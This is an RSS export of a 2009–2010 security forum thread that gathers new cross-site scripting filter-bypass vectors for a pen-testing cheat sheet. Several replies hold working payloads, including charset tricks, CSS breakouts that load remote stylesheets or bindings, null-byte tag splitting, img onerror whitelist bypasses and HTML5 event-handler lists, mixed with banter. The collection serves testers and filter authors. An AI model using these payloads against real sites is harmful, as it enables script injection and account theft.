<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel>
        <title>New Version of the XSS Cheat Sheet</title>
        <description>Hey guys - sorry I haven't posted in a while.  Busy busy busy.  But I'm here to solicit your help!  I finally got around to re-testing all of the old vectors, updating them and writing it all up for the next revision of the XSS Cheat Sheet.  What I haven't done is add new vectors in yet.  So this is your chance if you have known about something for years, want it on the page and want credit for having found it.  If you do want to update the cheat sheet with something here's the deal:

1) It must work in one of the browsers listed
2) It must work _without_ user interaction - onmouseover is great and all but it's terrible for demonstration purposes.
3) It must fire a popup with text at a minimum - alert(1) is fine for some things but in reality it must at least pop text to prove that it works for the folks who use this for pen-testing.
4) It must be _significantly_ different from all current vectors listed - by significantly I mean it can't replace a char or two.  It's gotta actually be different.
5) It must be a way to bypass filters - not just a JavaScript obfuscation technique - although it might be worthwhile to have one JavaScript obfuscation technique in there (the best/most important) and point back to tra.ckers or the thread on sla.ckers for the rest, since it's really it's own thing.

The goal of the XSS Cheat Sheet was never to make a completely exhaustive list - but rather to bring together unique filters to get people thinking about all the possibilities.  It's a cheat-sheet after all!  Here's a link to the new page (it will eventually replace the old page and/or I may keep the old page as a revision for posterity):  http://ha.ckers.org/xss2.html

So fire away with new vectors only.  Oh yeah, and if you paste something here that's identical to something that's already been on the page for three or four years now, I'm going to put a doorknob in a sock and beat you with it.  Control-F isn't that hard.</description>
        <link>http://sla.ckers.org/forum/read.php?2,29779,29779#msg-29779</link>
        <lastBuildDate>Wed, 22 May 2013 08:22:31 -0500</lastBuildDate>
        <generator>Phorum 5.2.15a</generator>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,34534#msg-34534</guid>
            <title>Re: New Version of the XSS Cheat Sheet</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,34534#msg-34534</link>
            <description><![CDATA[Haven't checked these, but im sure there are a couple new ones.<br />
<br />
<pre class="bbcode">
    onafterprint
    onbeforeprint
    onbeforeunload
    onemptied
    ondurationchange
    onhashchange
    onmessage
    onoffline
    ononline
    onpagehide
    onplaying
    onpageshow
    oncanplay
    onpopstate
    onratechange
    onredo
    onresize
    onreset
    onstorage
    onseeking
    onsuspend
    onstalled
    onundo
    onunload
    onwebkitanimationiteration
    onwebkittransitionend
</pre>]]></description>
            <dc:creator>Skyphire</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sat, 22 May 2010 07:44:16 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,34533#msg-34533</guid>
            <title>Re: New Version of the XSS Cheat Sheet</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,34533#msg-34533</link>
            <description><![CDATA[<pre class="bbcode">onhashchange=&quot;event&quot;</pre>
<br />
hehe.<br />
<br />
<br />
Provided code by whatwg:<br />
<br />
<pre class="bbcode">

&lt;!DOCTYPE HTML&gt;
&lt;html&gt;
 &lt;head&gt;
  &lt;title&gt;onhashchange&lt;/title&gt;
 &lt;/head&gt;
 &lt;body onload=&quot;update()&quot; onhashchange=&quot;update()&quot;&gt;
  &lt;h1&gt;onhashchange&lt;/h1&gt;

  &lt;p&gt;&lt;a href=&quot;#a&quot;&gt;AAAA&lt;/a&gt; &lt;a href=&quot;#b&quot;&gt;BBBB&lt;/a&gt;&lt;/p&gt;

  &lt;p id=message&gt;...&lt;/p&gt;

  &lt;script&gt;

   function update() {
     if (location.hash) {
       var msg = location.hash.substr(1);
       document.getElementById('message').firstChild.data = msg;
     }
   }

  &lt;/script&gt;

 &lt;/body&gt;
&lt;/html&gt;
</pre>]]></description>
            <dc:creator>Skyphire</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sat, 22 May 2010 07:20:37 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,34527#msg-34527</guid>
            <title>Re: New Version of the XSS Cheat Sheet</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,34527#msg-34527</link>
            <description><![CDATA[http://heideri.ch/jso/#86 Nice - found out during testing that Safari does autofocus too meanwhile - tsts]]></description>
            <dc:creator>Anonymous User</dc:creator>
            <category>XSS Info</category>
            <pubDate>Fri, 21 May 2010 17:03:26 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,34520#msg-34520</guid>
            <title>Re: New Version of the XSS Cheat Sheet</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,34520#msg-34520</link>
            <description><![CDATA[New HTML5 event handler: <pre class="bbcode">oninput=&quot;&quot;</pre>
<br />
Browser test page: http://jsbin.com/efalu/7]]></description>
            <dc:creator>Skyphire</dc:creator>
            <category>XSS Info</category>
            <pubDate>Fri, 21 May 2010 10:56:57 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,34362#msg-34362</guid>
            <title>Re: New Version of the XSS Cheat Sheet</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,34362#msg-34362</link>
            <description><![CDATA[So - after adding almost 30 vectors it's time to show where and how the action happens (don't bookmark - the domain will change and I will keep u posted)<br />
<br />
http://heideri.ch/jso/<br />
<br />
No SEO, no jizz nor goo - just an attempt to create a place where this madness is being collected to be freely available for whatever you need it. Scanners, your own internal cheat sheet, ... up to you. You got a contribution? Ping me or one of the other project owners:<br />
<br />
http://code.google.com/p/html5security/<br />
<br />
More vectors coming tomorrow.]]></description>
            <dc:creator>Anonymous User</dc:creator>
            <category>XSS Info</category>
            <pubDate>Fri, 30 Apr 2010 16:32:39 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,34331#msg-34331</guid>
            <title>Re: New Version of the XSS Cheat Sheet</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,34331#msg-34331</link>
            <description><![CDATA[Ohmy... &quot;Autofocus&quot; *sigh* there we go. Didn't know about that, cool actually. it brings some more logic to HTML. I wonder if we can bubble the focus to another element this way, then we might have some cool file stealer going on. ;)]]></description>
            <dc:creator>Skyphire</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 27 Apr 2010 17:56:48 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,34321#msg-34321</guid>
            <title>Re: New Version of the XSS Cheat Sheet</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,34321#msg-34321</link>
            <description><![CDATA[@Skyphire: onfocus and onblur usually require user interaction - with HTML5 autofocus attributes the don't anymore.]]></description>
            <dc:creator>Anonymous User</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 27 Apr 2010 08:20:25 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,34319#msg-34319</guid>
            <title>Re: New Version of the XSS Cheat Sheet</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,34319#msg-34319</link>
            <description><![CDATA[@mario<br />
<br />
Why onfocus &amp; onblur? or the other list of inline events and style for that matter? they are already known right?]]></description>
            <dc:creator>Skyphire</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 27 Apr 2010 08:04:02 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,34314#msg-34314</guid>
            <title>Re: New Version of the XSS Cheat Sheet</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,34314#msg-34314</link>
            <description><![CDATA[@mario <br />
<br />
Sweeeeeeet]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Mon, 26 Apr 2010 15:20:21 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,34313#msg-34313</guid>
            <title>Re: New Version of the XSS Cheat Sheet</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,34313#msg-34313</link>
            <description><![CDATA[Okay - it's on!<br />
<br />
http://code.google.com/p/html5security/<br />
<br />
http://code.google.com/p/html5security/source/browse/#svn/trunk]]></description>
            <dc:creator>Anonymous User</dc:creator>
            <category>XSS Info</category>
            <pubDate>Mon, 26 Apr 2010 14:09:35 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,34256#msg-34256</guid>
            <title>Re: New Version of the XSS Cheat Sheet</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,34256#msg-34256</link>
            <description><![CDATA[That's pretty cool]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 22 Apr 2010 17:49:48 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,34255#msg-34255</guid>
            <title>Re: New Version of the XSS Cheat Sheet</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,34255#msg-34255</link>
            <description><![CDATA[Despite the assumption the XSS cheat sheet has other purposes than being an XSS cheat sheet - here's some new meat (all Gecko based user agents):<br />
<br />
<pre class="bbcode">&lt;meta charset=&quot;x-imap4-modified-utf7&quot;&amp;&amp;&gt;&amp;&amp;&lt;script&amp;&amp;&gt;alert(1)&amp;&amp;;&amp;&amp;&lt;&amp;&amp;/script&amp;&amp;&gt;</pre>]]></description>
            <dc:creator>Anonymous User</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 22 Apr 2010 16:16:18 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,33886#msg-33886</guid>
            <title>Re: New Version of the XSS Cheat Sheet</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,33886#msg-33886</link>
            <description><![CDATA[What about this one? Works on IE8 and IE9 <br />
<br />
<pre class="bbcode">&lt;style&gt;@import'vb\script:alert(1)&lt;/style&gt;</pre>]]></description>
            <dc:creator>Anonymous User</dc:creator>
            <category>XSS Info</category>
            <pubDate>Wed, 17 Mar 2010 15:42:47 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,33851#msg-33851</guid>
            <title>Re: New Version of the XSS Cheat Sheet</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,33851#msg-33851</link>
            <description><![CDATA[It's helped me at least once :)]]></description>
            <dc:creator>Kyo</dc:creator>
            <category>XSS Info</category>
            <pubDate>Mon, 15 Mar 2010 06:31:44 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,33849#msg-33849</guid>
            <title>Re: New Version of the XSS Cheat Sheet</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,33849#msg-33849</link>
            <description><![CDATA[@Kyo <br />
<br />
Nice idea that actually, but any good whitelist will either drop the src or rewrite it. Still nice vector though]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Mon, 15 Mar 2010 04:48:12 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,33848#msg-33848</guid>
            <title>Re: New Version of the XSS Cheat Sheet</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,33848#msg-33848</link>
            <description><![CDATA[Am I late to the party?<br />
<br />
whitelist bypassing;<br />
<br />
<br />
&lt;img src= alt=&quot; onerror=alert(1)//&quot;&gt;]]></description>
            <dc:creator>Kyo</dc:creator>
            <category>XSS Info</category>
            <pubDate>Mon, 15 Mar 2010 04:20:34 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,33705#msg-33705</guid>
            <title>Re: New Version of the XSS Cheat Sheet</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,33705#msg-33705</link>
            <description><![CDATA[@LeverOne <br />
 <br />
&lt;sarcasm&gt;I'm sorry your vectors contain a single quote this is already on the cheatsheet, we don't include vectors that can be made using elements of previous vectors.......&lt;/sarcasm&gt;<br />
<br />
<br />
&lt;praise&gt;<br />
Nice vectors! I like your CSS break out<br />
&lt;/praise&gt;]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 04 Mar 2010 02:50:51 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,33701#msg-33701</guid>
            <title>Re: New Version of the XSS Cheat Sheet</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,33701#msg-33701</link>
            <description><![CDATA[Continue!<br />
<br />
1. <blockquote class="bbcode"><div><small>Quote<br/></small><strong>ha.ckers.org/xss2.html</strong><br/><pre class="bbcode">&lt;P STYLE=&quot;behavior:url('#default#time2')&quot; onEnd=&quot;alert('XSS')&quot;&gt;</pre></div></blockquote>
<br />
The power of this vector is still not fully identified and it generates questions. This should be replaced by <pre class="bbcode">&lt;P STYLE=&quot;behavior:url('#default#time2')&quot; <b>end=&quot;0&quot;</b> onEnd=&quot;alert('XSS')&quot;&gt;</pre>  or better  <pre class="bbcode">&lt;P STYLE=&quot;behavior:url('#default#time2')&quot; onBegin=&quot;alert('XSS')&quot;&gt;</pre>.<br />
<br />
I already wrote about this.<br />
<br />
2. <blockquote class="bbcode"><div><small>Quote<br/></small><strong>ha.ckers.org/xss2.html</strong><br/>
<br />
<pre class="bbcode">&lt;STYLE&gt;@import'http://ha.ckers.org/xss.css';&lt;/STYLE&gt;
&lt;STYLE&gt;@im\port'ht\tp://ha.c\kers.org/xss-retest.css';&lt;/STYLE&gt;</pre>
</div></blockquote>
<br />
Need to add: <br />
<br />
<pre class="bbcode">&lt;STYLE&gt;a{background:url('s1' 's2)}@import javascript:alert(1);');}&lt;/STYLE&gt;</pre>  // IE 6<br />
<br />
<br />
or better<br />
<br />
<pre class="bbcode">&lt;STYLE&gt;a{background:url('s1' 's2)}@import url(http://ha.ckers.org/xss.css);');}&lt;/STYLE&gt;</pre> // IE 6-8 (breaking out of css-string + rules after something)<br />
<br />
<br />
to your taste...<br />
<br />
3. <blockquote class="bbcode"><div><small>Quote<br/></small><strong>ha.ckers.org/xss2.html</strong><br/><pre class="bbcode">&lt;STYLE&gt;BODY{-moz-binding:url(&quot;http://ha.ckers.org/xssmoz.xml#xss&quot;)}&lt;/STYLE&gt;</pre></div></blockquote>
<br />
It should be replaced:<br />
<br />
<pre class="bbcode">&lt;STYLE&gt;BODY{property:&quot;
invalid;-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss);&quot;}&lt;/STYLE&gt;</pre>    //FF 3.6 + breaking out of css-string<br />
<br />
<br />
or better<br />
<br />
<pre class="bbcode">&lt;body style=&quot;property:'&amp;#10invalid;-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss);'&quot;&gt;</pre>
<br />
<br />
4. <blockquote class="bbcode"><div><small>Quote<br/></small><strong>ha.ckers.org/xss2.html</strong><br/>
<pre class="bbcode">perl -e 'print &quot;&lt;SCR\0IPT&gt;alert(\&quot;XSS\&quot;)&lt;/SCR\0IPT&gt;&quot;;' &gt; out</pre>    // IE  (in tag)<br />
<br />
<pre class="bbcode">perl -e 'print &quot;&lt;IMG SRC=\&quot;\&quot; o\0nerror=alert(\&quot;XSS\&quot;)&gt;&quot;;' &gt; out</pre>  // IE  (in attribute)</div></blockquote>
<br />
Need to add:<br />
<br />
<pre class="bbcode">perl -e 'print &quot;&lt;IMG\0zzz SRC=\&quot;\&quot; onerror\0zzz=alert(\&quot;XSS\&quot;)&gt;&quot;;' &gt; out</pre>    // GC 4 &amp; Safari 4.0.4   (right side (after \0) in the tagname and attribute is ignored, but left side is valid)<br />
<br />
<br />
And the logical conclusion:<br />
<br />
<pre class="bbcode">perl -e 'print &quot;&lt;IMG STYLE=xss:expr/\0*XSS*\0/ession(alert(\&quot;XSS\&quot;))&gt;&quot;;' &gt; out</pre>   // IE (in parameter, bypass filtering comments). This comment is also valid in GC &amp; Safari, if stylesheet into &quot;&lt;style&gt;&quot;.<br />
<br />
<br />
<br />
@all, the show must go on!!!<br />
<br />
<br />
P.S.  <blockquote class="bbcode"><div><small>Quote<br/></small><strong>rsnake</strong><br/>Posted by: rsnake<br />
Date: August 10, 2009</div></blockquote>
<br />
<blockquote class="bbcode"><div><small>Quote<br/></small><strong>ha.ckers.org/xss2.html</strong><br/>Check back in a week or two!</div></blockquote>
<br />
:D:D:D<br />
<br />
<br />
upd1: @Gareth, nice! haha :)) Yep, &lt;imitation&gt;I'll do my own&lt;/imitation&gt;<br />
<br />
<br />
LeverOne]]></description>
            <dc:creator>LeverOne</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 04 Mar 2010 01:41:23 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,30374#msg-30374</guid>
            <title>n</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,30374#msg-30374</link>
            <description><![CDATA[o]]></description>
            <dc:creator>Anonymous User</dc:creator>
            <category>XSS Info</category>
            <pubDate>Mon, 07 Sep 2009 05:20:29 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,29921#msg-29921</guid>
            <title>Re: New Version of the XSS Cheat Sheet</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,29921#msg-29921</link>
            <description><![CDATA[Oh, this is not very well known, so... <br />
<br />
&lt;&amp;#383;cript&gt;<br />
<br />
changes to &lt;SCRIPT&gt; when:<br />
<br />
&quot;\u017fcript&quot;.toUpperCase()<br />
<br />
unicode for the win!<br />
<br />
credit goes to chris weber that guy rocks..]]></description>
            <dc:creator>sirdarckcat</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sun, 16 Aug 2009 21:54:18 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,29903#msg-29903</guid>
            <title>Re: New Version of the XSS Cheat Sheet</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,29903#msg-29903</link>
            <description><![CDATA[oh god.. <img src="http://www.piffe.com/funanimaux/spycat.jpg" class="bbcode" border="0" /><br />
<br />
dross and jeremiah are also CISSP iirc heh]]></description>
            <dc:creator>sirdarckcat</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sat, 15 Aug 2009 23:07:36 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,29900#msg-29900</guid>
            <title>Re: New Version of the XSS Cheat Sheet</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,29900#msg-29900</link>
            <description><![CDATA[i don't want to see thornmaker dancing almost naked in the street with his CISSP certif folded in fig leaf... O_o]]></description>
            <dc:creator>nEUrOO</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sat, 15 Aug 2009 17:52:00 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,29899#msg-29899</guid>
            <title>Re: New Version of the XSS Cheat Sheet</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,29899#msg-29899</link>
            <description><![CDATA[I think you should have a CISSP pride day]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sat, 15 Aug 2009 17:28:00 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,29898#msg-29898</guid>
            <title>Re: New Version of the XSS Cheat Sheet</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,29898#msg-29898</link>
            <description><![CDATA[@thornmaker yeah, add &quot;Thornmaker, CISSP&quot; in your signature :} -- be proud! it's okay you know...]]></description>
            <dc:creator>nEUrOO</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sat, 15 Aug 2009 16:28:30 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,29895#msg-29895</guid>
            <title>Re: New Version of the XSS Cheat Sheet</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,29895#msg-29895</link>
            <description><![CDATA[@thornmaker<br />
<br />
hahahahahahhahhaahaha you kept that quiet<br />
**Pointing and laughing**]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sat, 15 Aug 2009 15:13:53 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,29890#msg-29890</guid>
            <title>Re: New Version of the XSS Cheat Sheet</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,29890#msg-29890</link>
            <description><![CDATA[so this must be what my brother felt like when my mom outted him...  I guess I can wear my CSSLP hat outside with pride now]]></description>
            <dc:creator>thornmaker</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sat, 15 Aug 2009 14:43:39 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,29887#msg-29887</guid>
            <title>Re: New Version of the XSS Cheat Sheet</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,29887#msg-29887</link>
            <description><![CDATA[sirdarckcat Wrote:<br />
&gt; <br />
&gt; the cheatsheet would still be used by.. well..<br />
&gt; CISSPs, and tra.ckers by us :)<br />
<br />
I don't wanna spoil anything, but thornmaker is CISSP'd :P]]></description>
            <dc:creator>nEUrOO</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sat, 15 Aug 2009 12:57:03 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,29882#msg-29882</guid>
            <title>Re: New Version of the XSS Cheat Sheet</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,29882#msg-29882</link>
            <description><![CDATA[Oh my :)]]></description>
            <dc:creator>Anonymous User</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sat, 15 Aug 2009 10:27:55 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,29880#msg-29880</guid>
            <title>Re: New Version of the XSS Cheat Sheet</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,29880#msg-29880</link>
            <description><![CDATA[a slap on the wrist for being so old! Ghehe.]]></description>
            <dc:creator>rvdh</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sat, 15 Aug 2009 10:19:23 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29779,29879#msg-29879</guid>
            <title>Re: New Version of the XSS Cheat Sheet</title>
            <link>http://sla.ckers.org/forum/read.php?2,29779,29879#msg-29879</link>
            <description><![CDATA[I've been using half open image tags since back then in the early fifties - and what did I get?]]></description>
            <dc:creator>Anonymous User</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sat, 15 Aug 2009 10:07:28 -0500</pubDate>
        </item>
    </channel>
</rss>
